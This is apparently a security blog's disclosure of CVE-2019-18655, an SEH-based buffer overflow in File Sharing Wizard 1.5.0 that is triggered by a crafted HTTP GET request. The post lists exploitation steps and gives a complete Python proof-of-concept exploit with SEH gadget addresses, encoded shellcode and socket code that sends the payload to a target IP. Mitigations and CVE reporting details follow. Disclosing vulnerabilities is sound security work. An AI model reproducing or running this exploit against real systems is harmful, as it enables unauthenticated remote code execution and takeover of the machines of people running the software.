Friday, November 08, 2019

CVE-2019-18655: FILE SHARING WIZARD VERSION 1.5 - GET SEH BASED BUFFER OVERFLOW

After spending several hours analyzing multiple binaries for vulnerabilities, a Structured Exception Handler (SEH)-based buffer overflow vulnerability was identified in the File Sharing Wizard binary, version 1.5.0. An unauthenticated attacker is able to achieve remote code execution (RCE) by sending a specially crafted HTTP GET request containing a malicious payload in the request's URL.

This vulnerability stems from improper input validation and bounds checking in the application’s request handling routines. When the input exceeds the expected buffer size, the overflow overwrites the SEH chain, enabling arbitrary code execution.

The vulnerability resembles previously disclosed issues such as:

  • CVE-2019-17415

  • CVE-2019-16724

  • CVE-2010-2331

In successful exploitation scenarios, attackers may gain shell access to the target system and execute arbitrary OS-level commands—without authentication.

Exploitation Steps

An attacker can exploit the vulnerability through the following steps:

  1. Identify a target running File Sharing Wizard v1.5.0 and accessible via HTTP.

  2. Craft a malicious URL containing a buffer overflow payload that corrupts the SEH handler.

  3. Send the HTTP GET request to the target using tools like Python scripts or exploit frameworks.

  4. Trigger the buffer overflow, leading to SEH chain hijacking and redirection of execution to attacker-controlled shellcode.

  5. Gain remote access via a command shell or reverse shell, with the same privileges as the running application.


Following is provided a Proof of Concept (PoC) exploit:

################### PoC ################### #!/usr/bin/python import socket import os import sys # Bad chars: \x00\x20 # # SEH value: 0x9090eb08 (JMP short) # # NSEH value: 0x7c37576d : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)  seh='\x6d\x57\x37\x7c' nseh='\x90\x90\xeb\x08' buf = b"" buf += b"\xbe\x8f\x59\xb8\x41\xdb\xd5\xd9\x74\x24\xf4\x5a\x31" buf += b"\xc9\xb1\x31\x31\x72\x13\x83\xea\xfc\x03\x72\x80\xbb" buf += b"\x4d\xbd\x76\xb9\xae\x3e\x86\xde\x27\xdb\xb7\xde\x5c" buf += b"\xaf\xe7\xee\x17\xfd\x0b\x84\x7a\x16\x98\xe8\x52\x19" buf += b"\x29\x46\x85\x14\xaa\xfb\xf5\x37\x28\x06\x2a\x98\x11" buf += b"\xc9\x3f\xd9\x56\x34\xcd\x8b\x0f\x32\x60\x3c\x24\x0e" buf += b"\xb9\xb7\x76\x9e\xb9\x24\xce\xa1\xe8\xfa\x45\xf8\x2a" buf += b"\xfc\x8a\x70\x63\xe6\xcf\xbd\x3d\x9d\x3b\x49\xbc\x77" buf += b"\x72\xb2\x13\xb6\xbb\x41\x6d\xfe\x7b\xba\x18\xf6\x78" buf += b"\x47\x1b\xcd\x03\x93\xae\xd6\xa3\x50\x08\x33\x52\xb4" buf += b"\xcf\xb0\x58\x71\x9b\x9f\x7c\x84\x48\x94\x78\x0d\x6f" buf += b"\x7b\x09\x55\x54\x5f\x52\x0d\xf5\xc6\x3e\xe0\x0a\x18" buf += b"\xe1\x5d\xaf\x52\x0f\x89\xc2\x38\x45\x4c\x50\x47\x2b" buf += b"\x4e\x6a\x48\x1b\x27\x5b\xc3\xf4\x30\x64\x06\xb1\xcf" buf += b"\x2e\x0b\x93\x47\xf7\xd9\xa6\x05\x08\x34\xe4\x33\x8b" buf += b"\xbd\x94\xc7\x93\xb7\x91\x8c\x13\x2b\xeb\x9d\xf1\x4b" buf += b"\x58\x9d\xd3\x2f\x3f\x0d\xbf\x81\xda\xb5\x5a\xde" poc= 'A' * 1035 + nseh + seh + '\x90' * 10 + buf + '\x90' * (3949-len(buf)) payload='GET //.:/' + poc + ' HTTP/1.0\r\n\r\n' s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("172.16.216.135", 80)) s.send(payload) s.close 

Recommended Mitigations:

  • Immediately restrict or disable access to File Sharing Wizard instances exposed to untrusted networks.

  • Apply vendor patches or consider replacing the software if no fix is available.

  • Implement network-based intrusion prevention systems (IPS) to detect and block exploit patterns.

  • Monitor logs and network traffic for anomalous GET requests targeting the service.

Conclusion

This vulnerability in File Sharing Wizard v1.5.0 represents a severe security risk  due to its unauthenticated nature and potential for full system compromise.

Reporting Information:

CVE Identifier: CVE-2019-18655
CVSS Score: 9.8
Affected Versions: 
File Sharing Wizard v1.5.0
Product URL: https://file-sharing-wizard.soft112.com/
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-18655
Reported By: Armando Huesca Prida
Tested on: 
  • Microsoft Windows Vista Ultimate 6.0.6002 Service Pack 2 Build 6002 
  • Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601